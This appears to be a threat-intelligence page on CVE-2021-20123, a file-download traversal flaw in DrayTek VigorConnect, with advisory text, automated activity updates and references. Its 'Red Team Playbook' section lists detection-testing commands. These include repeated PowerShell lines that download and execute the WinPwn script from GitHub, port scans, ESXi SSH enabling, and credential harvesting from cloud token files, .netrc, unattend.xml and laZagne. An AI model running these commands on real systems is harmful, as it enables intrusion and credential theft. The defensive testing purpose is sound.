CVE-2021-20123
Overview
This vulnerability is a local file inclusion (LFI) flaw rooted in insufficient input validation within the file download functionality of the DownloadFileServlet endpoint in Draytek VigorConnect 1.6.0-B3. The root cause lies in the servlet's failure to properly sanitize user-supplied file path parameters, allowing traversal outside intended directories. This affects the file download component, enabling access to arbitrary files on the underlying operating system.
Vulnerability Description
A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
Impact
An unauthenticated attacker can exploit this flaw to download arbitrary files from the server's filesystem with root privileges, potentially accessing sensitive configuration files, credentials, or other critical data. No user interaction or authentication is required, enabling remote information disclosure. This can lead to unauthorized access, data breaches, and facilitate further attacks such as privilege escalation or lateral movement within the affected environment.
Solution
Draytek recommends upgrading Draytek VigorConnect to a patched version beyond 1.6.0-B3 as detailed in their security advisory available at https://www.tenable.com/security/research/tra-2021-42. Users should apply the vendor-provided update that addresses input validation in the DownloadFileServlet component. Refer to the official advisory for step-by-step patching instructions and verify the version to ensure the vulnerability is remediated.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A local file inclusion vulnerability has been identified in the Draytek VigorConnect 1.6.0-B3, specifically within the file download functionality of the DownloadFileServlet endpoint. This vulnerability allows an unauthenticated attacker to exploit the system by manipulating the input parameters to access and download arbitrary files from the underlying operating system. The root cause lies in improper validation of user input, which fails to restrict access to sensitive files. As a result, attackers can leverage this flaw to gain access to critical system files, configuration files, or even sensitive data, potentially leading to further exploitation of the system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious request to the DownloadFileServlet endpoint, specifying a file path that points to sensitive files on the server. For instance, by using directory traversal techniques, an attacker could navigate the file system and request files outside the intended directory. This could include system files such as password files, configuration files, or any other sensitive data stored on the server. The ability to download these files with root privileges significantly amplifies the threat, as it could lead to the extraction of credentials or sensitive information that could be used for further attacks, including privilege escalation or lateral movement within the network.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on the affected product for their operations. The ability to download arbitrary files can lead to severe data breaches, loss of confidentiality, and potential regulatory repercussions. For businesses, the risk extends beyond immediate financial loss; it can damage reputation, erode customer trust, and result in legal liabilities. Organizations may face significant remediation costs, including incident response, forensic analysis, and potential fines from regulatory bodies. Furthermore, if sensitive customer data is compromised, the long-term impact on customer relationships and brand integrity can be devastating.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is essential to conduct a thorough security assessment of the affected systems to identify any instances of the vulnerability. Regular vulnerability scanning and penetration testing can help uncover weaknesses before they are exploited by malicious actors. Additionally, organizations should apply patches and updates provided by the vendor to remediate the vulnerability. Implementing strict input validation and sanitization measures can also help prevent unauthorized file access. Furthermore, employing web application firewalls (WAFs) can provide an additional layer of protection by filtering out malicious requests before they reach the application.
In conclusion, the local file inclusion vulnerability in Draytek VigorConnect 1.6.0-B3 poses a significant threat to organizations utilizing this product. The potential for unauthorized file access and data exfiltration underscores the importance of proactive security measures. By understanding the technical details of the vulnerability, recognizing the various attack vectors, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with this and similar vulnerabilities. Continuous monitoring and a robust security posture are essential to safeguard sensitive information and maintain operational integrity in an increasingly complex threat landscape.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-20123, with new telemetry indicating the vulnerability is being actively targeted after a period of dormancy. Although the EPSS score has decreased slightly, reflecting a modest reduction in overall exploit likelihood, the recent uptick in detection signals increased adversary interest and potential exploitation attempts in the wild. This shift is significant because it suggests that threat actors may be refining their tactics or expanding targeting to leverage the local file inclusion flaw in DrayTek VigorConnect, which could lead to unauthorized access to sensitive system files with elevated privileges. Defenders should interpret this development as an indication that the vulnerability remains a viable attack vector, warranting continued vigilance despite the absence of new exploit details or confirmed ransomware usage. The evolving exploitation landscape underscores the necessity of maintaining robust monitoring and response capabilities to detect and mitigate attempts leveraging this high-severity vulnerability.
Update 2 — July 06, 2026
CSURFACE threat intelligence has identified a slight increase in activity related to CVE-2021-20123, reflected by a modest rise in detection events across our telemetry. While no new exploit techniques or ransomware affiliations have been observed, this uptick signals persistent interest from threat actors in leveraging the local file inclusion vulnerability within DrayTek VigorConnect. The stability of the EPSS score at a high percentile underscores the continued exploitability and relevance of this flaw in the current threat landscape. For defenders, this development highlights the necessity to maintain heightened monitoring and detection efforts, as the vulnerability remains an active vector for potential unauthorized access with elevated privileges. Although the overall risk profile remains consistent with previous assessments, the observed increase in exploitation attempts suggests that adversaries continue to probe and potentially prepare for more widespread exploitation.
Update 3 — July 16, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting the local file inclusion vulnerability in DrayTek VigorConnect. While the overall frequency remains moderate, this uptick signals persistent adversary interest in leveraging the flaw to access sensitive system files with elevated privileges. The stability of the EPSS score at a high percentile continues to affirm the vulnerability’s exploitability, underscoring its relevance in current attack campaigns. Although no new exploit variants or ransomware affiliations have been detected, the incremental rise in detection activity suggests that threat actors are maintaining active reconnaissance and probing efforts. For defenders, this evolving pattern highlights the ongoing necessity to sustain vigilant monitoring and incident response capabilities, as the vulnerability remains a viable vector for unauthorized access despite the absence of significant changes in exploit sophistication or volume. Consequently, the threat level remains elevated but stable, reflecting continued exploitation potential without evidence of escalation into widespread or more aggressive attacks.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Draytek | Vigorconnect | 1.6.0 |
cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-20123 |
| tenable.com |
GitHub CVE
x_refsource_MISC
|
https://www.tenable.com/security/research/tra-2021-42 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-20123 |